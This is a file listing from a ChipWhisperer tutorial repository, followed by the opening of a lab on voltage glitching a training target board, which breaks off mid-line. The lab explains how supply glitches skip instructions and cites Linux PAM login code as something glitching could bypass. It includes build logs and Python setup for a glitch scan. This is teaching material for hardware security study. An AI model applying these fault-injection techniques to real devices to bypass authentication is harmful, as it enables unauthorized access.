├── .gitignore ├── README.md ├── courses_fault101_Fault 2_1B - Introduction to Voltage Glitching with CWNano-CWNANO-CWNANO.rst ├── courses_fault101_SOLN_Fault 1_1 - Introduction to Clock Glitching-OPENADC-CWLITEARM.rst ├── courses_fault101_SOLN_Fault 1_1 - Introduction to Clock Glitching-OPENADC-CWLITEXMEGA.rst ├── courses_fault101_SOLN_Fault 1_2 - Clock Glitching to Bypass Password-OPENADC-CWLITEARM.rst ├── courses_fault101_SOLN_Fault 1_2 - Clock Glitching to Bypass Password-OPENADC-CWLITEXMEGA.rst ├── courses_fault101_SOLN_Fault 1_3 - Clock Glitching to Memory Dump-OPENADC-CWLITEARM.rst ├── courses_fault101_SOLN_Fault 1_3 - Clock Glitching to Memory Dump-OPENADC-CWLITEXMEGA.rst ├── courses_fault101_SOLN_Fault 2_1 - Introduction to Voltage Glitching-OPENADC-CWLITEARM.rst ├── courses_fault101_SOLN_Fault 2_1 - Introduction to Voltage Glitching-OPENADC-CWLITEXMEGA.rst ├── courses_fault101_SOLN_Fault 2_1B - Introduction to Voltage Glitching with CWNano-CWNANO-CWNANO.rst ├── courses_fault101_SOLN_Fault 2_2 - Voltage Glitching to Bypass Password-OPENADC-CWLITEARM.rst ├── courses_fault101_SOLN_Fault 2_2 - Voltage Glitching to Bypass Password-OPENADC-CWLITEXMEGA.rst ├── courses_fault101_SOLN_Fault 2_2B - Voltage Glitching with CWNano to Bypass Password-CWNANO-CWNANO.rst ├── courses_fault101_SOLN_Fault 2_3 - Voltage Glitching to Memory Dump-OPENADC-CWLITEARM.rst ├── courses_fault101_SOLN_Fault 2_3 - Voltage Glitching to Memory Dump-OPENADC-CWLITEXMEGA.rst ├── courses_sca101SOLN_Lab 2_1B - Power Analysis for Password Bypass-OPENADC-CWLITEARM.rst ├── courses_sca101_SOLN_Lab 2_1B - Power Analysis for Password Bypass-CWNANO-CWNANO.rst ├── courses_sca101_SOLN_Lab 2_1B - Power Analysis for Password Bypass-OPENADC-CWLITEARM.rst ├── courses_sca101_SOLN_Lab 2_1B - Power Analysis for Password Bypass-OPENADC-CWLITEXMEGA.rst ├── courses_sca101_SOLN_Lab 3_1 - Large Hamming Weight Swings-CWNANO-CWNANO.rst ├── courses_sca101_SOLN_Lab 3_1 - Large Hamming Weight Swings-OPENADC-CWLITEARM.rst ├── courses_sca101_SOLN_Lab 3_1 - Large Hamming Weight Swings-OPENADC-CWLITEXMEGA.rst ├── courses_sca101_SOLN_Lab 3_2 - Recovering Data from a Single Bit-CWNANO-CWNANO.rst ├── courses_sca101_SOLN_Lab 3_2 - Recovering Data from a Single Bit-OPENADC-CWLITEARM.rst ├── courses_sca101_SOLN_Lab 3_2 - Recovering Data from a Single Bit-OPENADC-CWLITEXMEGA.rst ├── courses_sca101_SOLN_Lab 3_3 - DPA on Firmware Implementation of AES-CWNANO-CWNANO.rst ├── courses_sca101_SOLN_Lab 3_3 - DPA on Firmware Implementation of AES-OPENADC-CWLITEARM.rst ├── courses_sca101_SOLN_Lab 4_1 - Power and Hamming Weight Relationship-CWNANO-CWNANO.rst ├── courses_sca101_SOLN_Lab 4_1 - Power and Hamming Weight Relationship-OPENADC-CWLITEARM.rst ├── courses_sca101_SOLN_Lab 4_1 - Power and Hamming Weight Relationship-OPENADC-CWLITEXMEGA.rst ├── courses_sca101_SOLN_Lab 4_2 - CPA on Firmware Implementation of AES-CWNANO-CWNANO.rst ├── courses_sca101_SOLN_Lab 4_2 - CPA on Firmware Implementation of AES-OPENADC-CWLITEARM.rst ├── courses_sca101_SOLN_Lab 4_2 - CPA on Firmware Implementation of AES-OPENADC-CWLITEXMEGA.rst └── img ├── 4traces_aes_clkx1.png ├── 4traces_aes_clkx1_offset60000.png ├── 4traces_aes_clkx1_presample5000.png ├── 4traces_aes_clkx1_presample5000_zoom.png ├── 4traces_aes_clkx4.png ├── 4traces_aes_poortrigger.png ├── A9_LPC1114_CHANGES.jpg ├── A9_LPC_CWLITE_Conn.jpg ├── CWNANO-CWNANO-courses_fault101_Fault2_1B-IntroductiontoVoltageGlitchingwithCWNano_14_1.png ├── CWNANO-CWNANO-courses_fault101_Fault2_1B-IntroductiontoVoltageGlitchingwithCWNano_15_0.png ├── CWNANO-CWNANO-courses_fault101_SOLN_Fault2_1B-IntroductiontoVoltageGlitchingwithCWNano_14_1.png ├── CWNANO-CWNANO-courses_fault101_SOLN_Fault2_1B-IntroductiontoVoltageGlitchingwithCWNano_15_0.png ├── CWNANO-CWNANO-courses_fault101_SOLN_Fault2_2B-VoltageGlitchingwithCWNanotoBypassPassword_12_0.png ├── CWNANO-CWNANO-courses_fault101_SOLN_Fault2_2B-VoltageGlitchingwithCWNanotoBypassPassword_12_1.png ├── CWNANO-CWNANO-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_13_2.png ├── CWNANO-CWNANO-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_16_3.png ├── CWNANO-CWNANO-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_20_1.png ├── CWNANO-CWNANO-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_22_1.png ├── CWNANO-CWNANO-courses_sca101_SOLN_Lab3_1-LargeHammingWeightSwings_14_0.png ├── CWNANO-CWNANO-courses_sca101_SOLN_Lab3_2-RecoveringDatafromaSingleBit_24_0.png ├── CWNANO-CWNANO-courses_sca101_SOLN_Lab3_2-RecoveringDatafromaSingleBit_50_1.png ├── CWNANO-CWNANO-courses_sca101_SOLN_Lab3_3-DPAonFirmwareImplementationofAES_16_0.png ├── CWNANO-CWNANO-courses_sca101_SOLN_Lab3_3-DPAonFirmwareImplementationofAES_36_1.png ├── CWNANO-CWNANO-courses_sca101_SOLN_Lab3_3-DPAonFirmwareImplementationofAES_47_1.png ├── CWNANO-CWNANO-courses_sca101_SOLN_Lab3_3-DPAonFirmwareImplementationofAES_49_0.png ├── CWNANO-CWNANO-courses_sca101_SOLN_Lab3_3-DPAonFirmwareImplementationofAES_51_0.png ├── CWNANO-CWNANO-courses_sca101_SOLN_Lab4_1-PowerandHammingWeightRelationship_5_0.png ├── CWNANO-CWNANO-courses_sca101_SOLN_Lab4_2-CPAonFirmwareImplementationofAES_10_0.png ├── GoodVBadRef.png ├── OPENADC-CWLITEARM-SOLN_Fault1_1-IntroductiontoClockGlitching_20_0.png ├── OPENADC-CWLITEARM-SOLN_Fault1_1-IntroductiontoClockGlitching_32_10.png ├── OPENADC-CWLITEARM-SOLN_Fault1_1-IntroductiontoClockGlitching_32_12.png ├── OPENADC-CWLITEARM-SOLN_Fault1_1-IntroductiontoClockGlitching_34_0.png ├── OPENADC-CWLITEARM-SOLN_Fault1_3-ClockGlitchingtoMemoryDump_12_0.png ├── OPENADC-CWLITEARM-SOLN_Fault1_3-ClockGlitchingtoMemoryDump_20_6.png ├── OPENADC-CWLITEARM-SOLN_Fault1_3-ClockGlitchingtoMemoryDump_22_15.png ├── OPENADC-CWLITEARM-SOLN_Fault1_3-ClockGlitchingtoMemoryDump_22_19.png ├── OPENADC-CWLITEARM-SOLN_Fault2_1-IntroductiontoVoltageGlitching_14_0.png ├── OPENADC-CWLITEARM-SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_13_2.png ├── OPENADC-CWLITEARM-SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_16_3.png ├── OPENADC-CWLITEARM-SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_20_2.png ├── OPENADC-CWLITEARM-SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_22_1.png ├── OPENADC-CWLITEARM-SOLN_Lab3_1-LargeHammingWeightSwings_13_0.png ├── OPENADC-CWLITEARM-SOLN_Lab3_2-RecoveringDatafromaSingleBit_24_0.png ├── OPENADC-CWLITEARM-SOLN_Lab3_2-RecoveringDatafromaSingleBit_50_1.png ├── OPENADC-CWLITEARM-SOLN_Lab4_1-PowerandHammingWeightRelationship_5_0.png ├── OPENADC-CWLITEARM-SOLN_Lab4_2-CPAonFirmwareImplementationofAES_10_0.png ├── OPENADC-CWLITEARM-courses_fault101_SOLN_Fault1_1-IntroductiontoClockGlitching_20_0.png ├── OPENADC-CWLITEARM-courses_fault101_SOLN_Fault1_1-IntroductiontoClockGlitching_32_14.png ├── OPENADC-CWLITEARM-courses_fault101_SOLN_Fault1_1-IntroductiontoClockGlitching_34_0.png ├── OPENADC-CWLITEARM-courses_fault101_SOLN_Fault1_3-ClockGlitchingtoMemoryDump_12_0.png ├── OPENADC-CWLITEARM-courses_fault101_SOLN_Fault1_3-ClockGlitchingtoMemoryDump_20_6.png ├── OPENADC-CWLITEARM-courses_fault101_SOLN_Fault1_3-ClockGlitchingtoMemoryDump_22_3.png ├── OPENADC-CWLITEARM-courses_fault101_SOLN_Fault1_3-ClockGlitchingtoMemoryDump_22_4.png ├── OPENADC-CWLITEARM-courses_fault101_SOLN_Fault1_3-ClockGlitchingtoMemoryDump_22_5.png ├── OPENADC-CWLITEARM-courses_fault101_SOLN_Fault2_1-IntroductiontoVoltageGlitching_14_0.png ├── OPENADC-CWLITEARM-courses_sca101SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_13_2.png ├── OPENADC-CWLITEARM-courses_sca101SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_16_3.png ├── OPENADC-CWLITEARM-courses_sca101SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_20_2.png ├── OPENADC-CWLITEARM-courses_sca101SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_22_1.png ├── OPENADC-CWLITEARM-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_13_2.png ├── OPENADC-CWLITEARM-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_16_3.png ├── OPENADC-CWLITEARM-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_20_2.png ├── OPENADC-CWLITEARM-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_22_1.png ├── OPENADC-CWLITEARM-courses_sca101_SOLN_Lab3_1-LargeHammingWeightSwings_13_0.png ├── OPENADC-CWLITEARM-courses_sca101_SOLN_Lab3_2-RecoveringDatafromaSingleBit_24_0.png ├── OPENADC-CWLITEARM-courses_sca101_SOLN_Lab3_2-RecoveringDatafromaSingleBit_50_1.png ├── OPENADC-CWLITEARM-courses_sca101_SOLN_Lab3_3-DPAonFirmwareImplementationofAES_16_0.png ├── OPENADC-CWLITEARM-courses_sca101_SOLN_Lab3_3-DPAonFirmwareImplementationofAES_36_1.png ├── OPENADC-CWLITEARM-courses_sca101_SOLN_Lab3_3-DPAonFirmwareImplementationofAES_47_1.png ├── OPENADC-CWLITEARM-courses_sca101_SOLN_Lab3_3-DPAonFirmwareImplementationofAES_49_0.png ├── OPENADC-CWLITEARM-courses_sca101_SOLN_Lab3_3-DPAonFirmwareImplementationofAES_51_0.png ├── OPENADC-CWLITEARM-courses_sca101_SOLN_Lab4_1-PowerandHammingWeightRelationship_5_0.png ├── OPENADC-CWLITEARM-courses_sca101_SOLN_Lab4_2-CPAonFirmwareImplementationofAES_10_0.png ├── OPENADC-CWLITEXMEGA-courses_fault101_SOLN_Fault1_1-IntroductiontoClockGlitching_20_0.png ├── OPENADC-CWLITEXMEGA-courses_fault101_SOLN_Fault1_1-IntroductiontoClockGlitching_32_12.png ├── OPENADC-CWLITEXMEGA-courses_fault101_SOLN_Fault1_1-IntroductiontoClockGlitching_34_0.png ├── OPENADC-CWLITEXMEGA-courses_fault101_SOLN_Fault1_3-ClockGlitchingtoMemoryDump_12_0.png ├── OPENADC-CWLITEXMEGA-courses_fault101_SOLN_Fault1_3-ClockGlitchingtoMemoryDump_20_6.png ├── OPENADC-CWLITEXMEGA-courses_fault101_SOLN_Fault1_3-ClockGlitchingtoMemoryDump_22_5.png ├── OPENADC-CWLITEXMEGA-courses_fault101_SOLN_Fault2_1-IntroductiontoVoltageGlitching_14_0.png ├── OPENADC-CWLITEXMEGA-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_13_3.png ├── OPENADC-CWLITEXMEGA-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_16_3.png ├── OPENADC-CWLITEXMEGA-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_20_1.png ├── OPENADC-CWLITEXMEGA-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_22_1.png ├── OPENADC-CWLITEXMEGA-courses_sca101_SOLN_Lab3_1-LargeHammingWeightSwings_13_0.png ├── OPENADC-CWLITEXMEGA-courses_sca101_SOLN_Lab3_2-RecoveringDatafromaSingleBit_24_0.png ├── OPENADC-CWLITEXMEGA-courses_sca101_SOLN_Lab3_2-RecoveringDatafromaSingleBit_50_1.png ├── OPENADC-CWLITEXMEGA-courses_sca101_SOLN_Lab4_1-PowerandHammingWeightRelationship_5_0.png ├── OPENADC-CWLITEXMEGA-courses_sca101_SOLN_Lab4_2-CPAonFirmwareImplementationofAES_10_0.png ├── Resync_traces_ref.png ├── aes_operations.png ├── aesinput.png ├── clock_glitches.png ├── cw_2part.jpg ├── cwcapture_ufo.jpg ├── cwlite_plugged.jpg ├── cwlitearm_vs_cwlitexmega.jpg ├── cwnano.jpg ├── cwpro_ufo.jpg ├── cwufo_stm32f3.jpg ├── dpa-doublepeak.png ├── dpa_peakexample.png ├── shunt_chipwhisperer.png ├── spa_password_diffexample.png ├── spa_password_h_vs_0_overview.png ├── spa_password_h_vs_0_zoomed.png ├── spa_password_list_char1.png ├── stm_run1.png ├── traces_wrong.png ├── typehint.png └── uart_triggers.png /.gitignore: -------------------------------------------------------------------------------- 1 | *.html 2 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | The static tutorial files generated by jupyter tests. You're probably looking for the chipwhisperer/jupyter folder 2 | -------------------------------------------------------------------------------- /courses_fault101_Fault 2_1B - Introduction to Voltage Glitching with CWNano-CWNANO-CWNANO.rst: -------------------------------------------------------------------------------- 1 | Part 2, Topic 2: Introduction to Voltage Glitching (MAIN) 2 | ========================================================= 3 | 4 | 5 | 6 | **SUMMARY:** *While it’s not as sophisticated as the ChipWhisperer Lite 7 | or ChipWhisperer Pro’s glitch hardware, the ChipWhisperer Nano is also 8 | capable of glitching. In this lab, we’ll do some simple glitch tests on 9 | the Nano’s target board, showing how to scan through glitch settings and 10 | seeing what effect it has on the hardware.* 11 | 12 | **LEARNING OUTCOMES:** 13 | 14 | - Understanding how voltage glitching can be used to disrupt a target’s 15 | operation 16 | - Scanning glitch settings to determine successful ones 17 | 18 | Digital hardware devices have certain voltage and clock requirements to 19 | function properly. If these requirements are not met, the device can 20 | fail to function, or even be damage. By shorting the voltage pins of a 21 | microcontroller for controlled, short periods of time, we can cause it 22 | to behave erratically, clearning registers and skipping instructions. 23 | Such attacks can be immensely powerful in practice. Consider for example 24 | the following code from ``linux-util-2.24``: 25 | 26 | .. code:: c 27 | 28 | /* 29 | * auth.c -- PAM authorization code, common between chsh and chfn 30 | * (c) 2012 by Cody Maloney 31 | * 32 | * this program is free software. you can redistribute it and 33 | * modify it under the terms of the gnu general public license. 34 | * there is no warranty. 35 | * 36 | */ 37 | 38 | #include "auth.h" 39 | #include "pamfail.h" 40 | 41 | int auth_pam(const char *service_name, uid_t uid, const char *username) 42 | { 43 | if (uid != 0) { 44 | pam_handle_t *pamh = NULL; 45 | struct pam_conv conv = { misc_conv, NULL }; 46 | int retcode; 47 | 48 | retcode = pam_start(service_name, username, &conv, &pamh); 49 | if (pam_fail_check(pamh, retcode)) 50 | return FALSE; 51 | 52 | retcode = pam_authenticate(pamh, 0); 53 | if (pam_fail_check(pamh, retcode)) 54 | return FALSE; 55 | 56 | retcode = pam_acct_mgmt(pamh, 0); 57 | if (retcode == PAM_NEW_AUTHTOK_REQD) 58 | retcode = 59 | pam_chauthtok(pamh, PAM_CHANGE_EXPIRED_AUTHTOK); 60 | if (pam_fail_check(pamh, retcode)) 61 | return FALSE; 62 | 63 | retcode = pam_setcred(pamh, 0); 64 | if (pam_fail_check(pamh, retcode)) 65 | return FALSE; 66 | 67 | pam_end(pamh, 0); 68 | /* no need to establish a session; this isn't a 69 | * session-oriented activity... */ 70 | } 71 | return TRUE; 72 | } 73 | 74 | This is the login code for the Linux OS. Note that if we could skip the 75 | check of ``if (uid != 0)`` and simply branch to the end, we could avoid 76 | having to enter a password. This is the power of glitch attacks - not 77 | that we are breaking encryption, but simply bypassing the entire 78 | authentication module! 79 | 80 | Glitch Hardware 81 | ~~~~~~~~~~~~~~~ 82 | 83 | The ChipWhisperer Nano’s glitch setup is pretty simple. Like its bigger 84 | brothers, the Lite and the Pro, it uses a MOSFET to short the 85 | microcontroller’s voltage supply to ground: 86 | 87 | |image1| 88 | 89 | For the Nano, ``Glitch In`` is controlled by 2 parameters: 90 | 91 | 1. ``scope.glitch.ext_offset`` - The glitch will be inserted roughly 92 | ``8.3ns * scope.glitch.ext_offset`` 93 | 2. ``scope.glitch.repeat`` - The glitch will be inserted for roughly 94 | ``8.3ns * scope.glitch.repeat`` 95 | 96 | During this lab, we’ll be varying these parameters to see if we can get 97 | the target to mess up a calculation that it’s doing. 98 | 99 | .. |image1| image:: https://wiki.newae.com/images/8/82/Glitch-vccglitcher.png 100 | 101 | 102 | **In [1]:** 103 | 104 | .. code:: ipython3 105 | 106 | SCOPETYPE = 'CWNANO' 107 | PLATFORM = 'CWNANO' 108 | 109 | 110 | **In [2]:** 111 | 112 | .. code:: bash 113 | 114 | %%bash -s "$PLATFORM" 115 | cd ../../../hardware/victims/firmware/simpleserial-glitch 116 | make PLATFORM=$1 CRYPTO_TARGET=NONE 117 | 118 | 119 | **Out [2]:** 120 | 121 | 122 | 123 | .. parsed-literal:: 124 | 125 | SS\_VER set to SS\_VER\_1\_1 126 | rm -f -- simpleserial-glitch-CWNANO.hex 127 | rm -f -- simpleserial-glitch-CWNANO.eep 128 | rm -f -- simpleserial-glitch-CWNANO.cof 129 | rm -f -- simpleserial-glitch-CWNANO.elf 130 | rm -f -- simpleserial-glitch-CWNANO.map 131 | rm -f -- simpleserial-glitch-CWNANO.sym 132 | rm -f -- simpleserial-glitch-CWNANO.lss 133 | rm -f -- objdir/\*.o 134 | rm -f -- objdir/\*.lst 135 | rm -f -- simpleserial-glitch.s simpleserial.s stm32f0\_hal\_nano.s stm32f0\_hal\_lowlevel.s 136 | rm -f -- simpleserial-glitch.d simpleserial.d stm32f0\_hal\_nano.d stm32f0\_hal\_lowlevel.d 137 | rm -f -- simpleserial-glitch.i simpleserial.i stm32f0\_hal\_nano.i stm32f0\_hal\_lowlevel.i 138 | . 139 | Welcome to another exciting ChipWhisperer target build!! 140 | arm-none-eabi-gcc.exe (GNU Arm Embedded Toolchain 9-2020-q2-update) 9.3.1 20200408 (release) 141 | Copyright (C) 2019 Free Software Foundation, Inc. 142 | This is free software; see the source for copying conditions. There is NO 143 | warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 144 | 145 | . 146 | Compiling C: simpleserial-glitch.c 147 | arm-none-eabi-gcc -c -mcpu=cortex-m0 -I. -mthumb -mfloat-abi=soft -ffunction-sections -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DSTM32F030x6 -DSTM32F0 -DSTM32 -DDEBUG -DHAL\_TYPE=HAL\_stm32f0\_nano -DPLATFORM=CWNANO -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/simpleserial-glitch.lst -I.././simpleserial/ -I.././hal -I.././hal/stm32f0 -I.././hal/stm32f0/CMSIS -I.././hal/stm32f0/CMSIS/core -I.././hal/stm32f0/CMSIS/device -I.././hal/stm32f0/Legacy -I.././crypto/ -std=gnu99 -MMD -MP -MF .dep/simpleserial-glitch.o.d simpleserial-glitch.c -o objdir/simpleserial-glitch.o 148 | . 149 | Compiling C: .././simpleserial/simpleserial.c 150 | arm-none-eabi-gcc -c -mcpu=cortex-m0 -I. -mthumb -mfloat-abi=soft -ffunction-sections -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DSTM32F030x6 -DSTM32F0 -DSTM32 -DDEBUG -DHAL\_TYPE=HAL\_stm32f0\_nano -DPLATFORM=CWNANO -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/simpleserial.lst -I.././simpleserial/ -I.././hal -I.././hal/stm32f0 -I.././hal/stm32f0/CMSIS -I.././hal/stm32f0/CMSIS/core -I.././hal/stm32f0/CMSIS/device -I.././hal/stm32f0/Legacy -I.././crypto/ -std=gnu99 -MMD -MP -MF .dep/simpleserial.o.d .././simpleserial/simpleserial.c -o objdir/simpleserial.o 151 | . 152 | Compiling C: .././hal/stm32f0\_nano/stm32f0\_hal\_nano.c 153 | arm-none-eabi-gcc -c -mcpu=cortex-m0 -I. -mthumb -mfloat-abi=soft -ffunction-sections -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DSTM32F030x6 -DSTM32F0 -DSTM32 -DDEBUG -DHAL\_TYPE=HAL\_stm32f0\_nano -DPLATFORM=CWNANO -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/stm32f0\_hal\_nano.lst -I.././simpleserial/ -I.././hal -I.././hal/stm32f0 -I.././hal/stm32f0/CMSIS -I.././hal/stm32f0/CMSIS/core -I.././hal/stm32f0/CMSIS/device -I.././hal/stm32f0/Legacy -I.././crypto/ -std=gnu99 -MMD -MP -MF .dep/stm32f0\_hal\_nano.o.d .././hal/stm32f0\_nano/stm32f0\_hal\_nano.c -o objdir/stm32f0\_hal\_nano.o 154 | . 155 | Compiling C: .././hal/stm32f0/stm32f0\_hal\_lowlevel.c 156 | arm-none-eabi-gcc -c -mcpu=cortex-m0 -I. -mthumb -mfloat-abi=soft -ffunction-sections -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DSTM32F030x6 -DSTM32F0 -DSTM32 -DDEBUG -DHAL\_TYPE=HAL\_stm32f0\_nano -DPLATFORM=CWNANO -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/stm32f0\_hal\_lowlevel.lst -I.././simpleserial/ -I.././hal -I.././hal/stm32f0 -I.././hal/stm32f0/CMSIS -I.././hal/stm32f0/CMSIS/core -I.././hal/stm32f0/CMSIS/device -I.././hal/stm32f0/Legacy -I.././crypto/ -std=gnu99 -MMD -MP -MF .dep/stm32f0\_hal\_lowlevel.o.d .././hal/stm32f0/stm32f0\_hal\_lowlevel.c -o objdir/stm32f0\_hal\_lowlevel.o 157 | . 158 | Assembling: .././hal/stm32f0/stm32f0\_startup.S 159 | arm-none-eabi-gcc -c -mcpu=cortex-m0 -I. -x assembler-with-cpp -mthumb -mfloat-abi=soft -ffunction-sections -DF\_CPU=7372800 -Wa,-gstabs,-adhlns=objdir/stm32f0\_startup.lst -I.././simpleserial/ -I.././hal -I.././hal/stm32f0 -I.././hal/stm32f0/CMSIS -I.././hal/stm32f0/CMSIS/core -I.././hal/stm32f0/CMSIS/device -I.././hal/stm32f0/Legacy -I.././crypto/ .././hal/stm32f0/stm32f0\_startup.S -o objdir/stm32f0\_startup.o 160 | . 161 | Linking: simpleserial-glitch-CWNANO.elf 162 | arm-none-eabi-gcc -mcpu=cortex-m0 -I. -mthumb -mfloat-abi=soft -ffunction-sections -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DSTM32F030x6 -DSTM32F0 -DSTM32 -DDEBUG -DHAL\_TYPE=HAL\_stm32f0\_nano -DPLATFORM=CWNANO -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/simpleserial-glitch.o -I.././simpleserial/ -I.././hal -I.././hal/stm32f0 -I.././hal/stm32f0/CMSIS -I.././hal/stm32f0/CMSIS/core -I.././hal/stm32f0/CMSIS/device -I.././hal/stm32f0/Legacy -I.././crypto/ -std=gnu99 -MMD -MP -MF .dep/simpleserial-glitch-CWNANO.elf.d objdir/simpleserial-glitch.o objdir/simpleserial.o objdir/stm32f0\_hal\_nano.o objdir/stm32f0\_hal\_lowlevel.o objdir/stm32f0\_startup.o --output simpleserial-glitch-CWNANO.elf --specs=nano.specs --specs=nosys.specs -T .././hal/stm32f0\_nano/LinkerScript.ld -Wl,--gc-sections -lm -mthumb -mcpu=cortex-m0 -Wl,-Map=simpleserial-glitch-CWNANO.map,--cref -lm 163 | . 164 | Creating load file for Flash: simpleserial-glitch-CWNANO.hex 165 | arm-none-eabi-objcopy -O ihex -R .eeprom -R .fuse -R .lock -R .signature simpleserial-glitch-CWNANO.elf simpleserial-glitch-CWNANO.hex 166 | . 167 | Creating load file for EEPROM: simpleserial-glitch-CWNANO.eep 168 | arm-none-eabi-objcopy -j .eeprom --set-section-flags=.eeprom="alloc,load" \ 169 | --change-section-lma .eeprom=0 --no-change-warnings -O ihex simpleserial-glitch-CWNANO.elf simpleserial-glitch-CWNANO.eep \|\| exit 0 170 | . 171 | Creating Extended Listing: simpleserial-glitch-CWNANO.lss 172 | arm-none-eabi-objdump -h -S -z simpleserial-glitch-CWNANO.elf > simpleserial-glitch-CWNANO.lss 173 | . 174 | Creating Symbol Table: simpleserial-glitch-CWNANO.sym 175 | arm-none-eabi-nm -n simpleserial-glitch-CWNANO.elf > simpleserial-glitch-CWNANO.sym 176 | Size after: 177 | text data bss dec hex filename 178 | 4740 12 1292 6044 179c simpleserial-glitch-CWNANO.elf 179 | +-------------------------------------------------------- 180 | + Default target does full rebuild each time. 181 | + Specify buildtarget == allquick == to avoid full rebuild 182 | +-------------------------------------------------------- 183 | +-------------------------------------------------------- 184 | + Built for platform CWNANO Built-in Target (STM32F030) with: 185 | + CRYPTO\_TARGET = NONE 186 | + CRYPTO\_OPTIONS = 187 | +-------------------------------------------------------- 188 | 189 | 190 | 191 | 192 | **In [3]:** 193 | 194 | .. code:: ipython3 195 | 196 | %run "../../Setup_Scripts/Setup_Generic.ipynb" 197 | 198 | 199 | **Out [3]:** 200 | 201 | 202 | 203 | .. parsed-literal:: 204 | 205 | Serial baud rate = 38400 206 | INFO: Found ChipWhisperer😍 207 | 208 | 209 | 210 | 211 | **In [4]:** 212 | 213 | .. code:: ipython3 214 | 215 | fw_path = "../../../hardware/victims/firmware/simpleserial-glitch/simpleserial-glitch-{}.hex".format(PLATFORM) 216 | cw.program_target(scope, prog, fw_path) 217 | 218 | 219 | **Out [4]:** 220 | 221 | 222 | 223 | .. parsed-literal:: 224 | 225 | Serial baud rate = 115200 226 | Detected known STMF32: STM32F03xx4/03xx6 227 | Extended erase (0x44), this can take ten seconds or more 228 | Attempting to program 4751 bytes at 0x8000000 229 | STM32F Programming flash... 230 | STM32F Reading flash... 231 | Verified flash OK, 4751 bytes 232 | Serial baud rate = 38400 233 | 234 | 235 | 236 | 237 | **In [5]:** 238 | 239 | .. code:: ipython3 240 | 241 | scope.io.clkout = 7.5E6 242 | target.baud = 38400*7.5/7.37 243 | def reboot_flush(): 244 | scope.io.nrst = False 245 | time.sleep(0.05) 246 | scope.io.nrst = "high_z" 247 | time.sleep(0.05) 248 | #Flush garbage too 249 | target.flush() 250 | 251 | 252 | **Out [5]:** 253 | 254 | 255 | 256 | .. parsed-literal:: 257 | 258 | Serial baud rate = 39077.34056987788 259 | 260 | 261 | 262 | 263 | **In [6]:** 264 | 265 | .. code:: ipython3 266 | 267 | scope 268 | 269 | 270 | **Out [6]:** 271 | 272 | 273 | 274 | .. parsed-literal:: 275 | 276 | ChipWhisperer Nano Device 277 | fw_version = 278 | major = 0 279 | minor = 11 280 | debug = 0 281 | io = 282 | tio1 = None 283 | tio2 = None 284 | tio3 = None 285 | tio4 = None 286 | pdid = True 287 | pdic = False 288 | nrst = True 289 | clkout = 7500000.0 290 | adc = 291 | clk_src = int 292 | clk_freq = 7500000.0 293 | samples = 5000 294 | glitch = 295 | repeat = 0 296 | ext_offset = 0 297 | 298 | 299 | 300 | 301 | **In [7]:** 302 | 303 | .. code:: ipython3 304 | 305 | reboot_flush() 306 | scope.arm() 307 | target.write("g\n") 308 | scope.capture() 309 | val = target.simpleserial_read_witherrors('r', 4, glitch_timeout=10)#For loop check 310 | valid = val['valid'] 311 | if valid: 312 | response = val['payload'] 313 | raw_serial = val['full_response'] 314 | error_code = val['rv'] 315 | print(val) 316 | 317 | 318 | **Out [7]:** 319 | 320 | 321 | 322 | .. parsed-literal:: 323 | 324 | {'valid': True, 'payload': CWbytearray(b'c4 09 00 00'), 'full\_response': 'rC4090000\n', 'rv': 0} 325 | 326 | 327 | 328 | 329 | **In [8]:** 330 | 331 | .. code:: ipython3 332 | 333 | import chipwhisperer.common.results.glitch as glitch 334 | gc = glitch.GlitchController(groups=["success", "reset", "normal"], parameters=["repeat", "ext_offset"]) 335 | gc.display_stats() 336 | 337 | 338 | **Out [8]:** 339 | 340 | 341 | 342 | 343 | 344 | 345 | 346 | 347 | 348 | 349 | 350 | Some tips for finding good glitches: 351 | 352 | 1. This is a VCC line that we’re shorting, so there’s going to be stuff 353 | fighting against us. If your glitch is too short, it might not have 354 | any effect 355 | 2. Likewise, if your glitch is too long, the target will always crash. 356 | There’s typically a small band where you’re able to affect the 357 | target, but it won’t always crash it. 358 | 3. Be patient. Glitching can be somewhat inconsistant, so don’t be 359 | discouraged if it takes a while to see some success! 360 | 361 | 362 | **In [9]:** 363 | 364 | .. code:: ipython3 365 | 366 | %matplotlib inline 367 | import 